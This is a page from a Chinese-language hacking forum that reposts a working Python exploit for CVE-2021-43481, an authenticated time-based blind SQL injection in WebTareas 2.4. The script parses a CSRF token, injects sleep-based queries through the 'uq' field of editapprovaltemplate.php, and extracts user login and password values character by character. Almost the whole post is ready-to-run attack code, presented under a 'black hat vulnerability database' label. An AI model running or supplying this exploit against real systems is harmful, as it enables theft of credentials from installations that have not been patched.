跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

WebTareas 2.4 - Blind SQLi (Authenticated)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481

#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i

import requests, time, sys
from bs4 import BeautifulSoup
ip = sys.argv[1]
id = sys.argv[2]
sid = sys.argv[3]

def sqli(column):
    print("Extracting %s from user with ID: %s\n" % (column,id))
    extract = ""
    for i in range (1,33):
        #This conditional statement will account for variable length usernames
        if(len(extract) < i-1):
            break
        for j in range(32,127):
            injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
            url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
            GET_cookies = {"webTareasSID": "%s" % sid}
            r = requests.get(url, cookies=GET_cookies)
            #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
            token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
            #Because this is an authenticated vulnerability we need to provide a valid session token
            POST_cookies = {"webTareasSID": "%s" % sid}
            POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
            start = time.time()
            requests.post(url, cookies=POST_cookies, data=POST_data)
            end = time.time() - start
            if end > 5:
                extract += chr(j)
                print ("\033[A\033[A")
                print(extract)
                break
#Modularized the script for login and password values
sqli("login")
sqli("password")

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。